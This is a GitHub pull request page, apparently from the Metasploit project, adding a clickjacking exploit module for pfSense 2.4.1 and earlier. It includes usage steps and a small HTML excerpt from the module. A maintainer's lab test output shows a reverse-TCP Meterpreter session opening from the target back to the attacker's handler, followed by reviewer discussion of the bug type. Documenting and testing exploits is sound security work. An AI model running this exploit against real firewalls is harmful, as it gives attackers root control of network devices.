New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add exploit module for Clickjacking vulnerability in CSRF error page pfSense <= 2.4.1 #9234

Merged
merged 6 commits into from Dec 12, 2017

Conversation

Projects
None yet
8 participants
@ykoster
Contributor

ykoster commented Nov 22, 2017

This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1.

pfSense is a free and open source firewall and router. It was found that the pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin into interacting with a specially crafted webpage it is possible for an attacker to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user, this will result in a full compromise of the pfSense instance.

Verification

The victim should be able to access the WebGUI & must be logged in as admin in order for this exploit to work. Possibly the WebGUI's TLS certificate must be trusted in the browser.

  • use exploit/unix/http/pfsense_clickjacking
  • set TARGETURI https://<ip WebGUI>
  • exploit
  • Browse to the URL returned by MSF
  • Click anywhere on the returned page
  • Note that a new Meterpreter sessions was started.

ykoster added some commits Nov 22, 2017

resp.body = %Q|<!DOCTYPE html>
<html>
<meta charset="utf-8">
<link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.css" />

This comment has been minimized.

@jvoisin

jvoisin Nov 27, 2017

Contributor

I don't think that we want to depend on external javascript :/

@ykoster

This comment has been minimized.

Contributor

ykoster commented Dec 2, 2017

Included static content as suggested by @jvoisin

@wchen-r7 wchen-r7 self-assigned this Dec 12, 2017

@wchen-r7

This comment has been minimized.

Contributor

wchen-r7 commented Dec 12, 2017

Works as advertised:

msf exploit(pfsense_clickjacking) > show options

Module options (exploit/unix/http/pfsense_clickjacking):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   SRVHOST    0.0.0.0               yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080                  yes       The local port to listen on.
   SSL        false                 no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  http://172.16.85.132  yes       The base path to the web application
   URIPATH                          no        The URI to use for this exploit (default is random)


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.85.1      yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   pfSense <= 2.4.1


msf exploit(pfsense_clickjacking) > set srvhost 172.16.85.1
srvhost => 172.16.85.1
msf exploit(pfsense_clickjacking) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.16.85.1:4444 
[*] Using URL: http://172.16.85.1:8080/vB3oWRYgtwaFtR
[*] Server started.
msf exploit(pfsense_clickjacking) > [*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/cookieconsent.min.css Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/cookieconsent.min.js Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] 172.16.85.1      pfsense_clickjacking - GET /vB3oWRYgtwaFtR/background.jpg Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
[*] Sending stage (37543 bytes) to 172.16.85.132
[*] Meterpreter session 1 opened (172.16.85.1:4444 -> 172.16.85.132:43529) at 2017-12-12 14:25:36 -0600

@wchen-r7 wchen-r7 merged commit 942e44c into rapid7:master Dec 12, 2017

2 checks passed

Metasploit Automation - Test Execution Successfully ran `autoPayloadTest.py`.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request Dec 12, 2017

@wchen-r7

This comment has been minimized.

Contributor

wchen-r7 commented Dec 12, 2017

Release Notes

This exploits a CSRF in pfSense that allows the attack to perform a click-jacking attack.

@stevenseeley

This comment has been minimized.

Contributor

stevenseeley commented Dec 12, 2017

I know this is already merged, but I am just curious, where in the module is the csrf click jacking page used (csrf-magic.php) as per the blog post? This looks like a csrf attack to diag_command.php, in which case, no clicky is required.

@h00die

This comment has been minimized.

Contributor

h00die commented Dec 12, 2017

Line 82 shows diag_command.php as the target

@stevenseeley

This comment has been minimized.

Contributor

stevenseeley commented Dec 13, 2017

huh, where? also, my point still stands. This is csrf isn't it?

@stevenseeley

This comment has been minimized.

Contributor

stevenseeley commented Dec 13, 2017

Yep, I see how its working now. My bad.

@ykoster

This comment has been minimized.

Contributor

ykoster commented Dec 13, 2017

I suppose targeting the file editor would also work, less trivial though

@tdoan-r7 tdoan-r7 added the rn-exploit label Dec 20, 2017

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment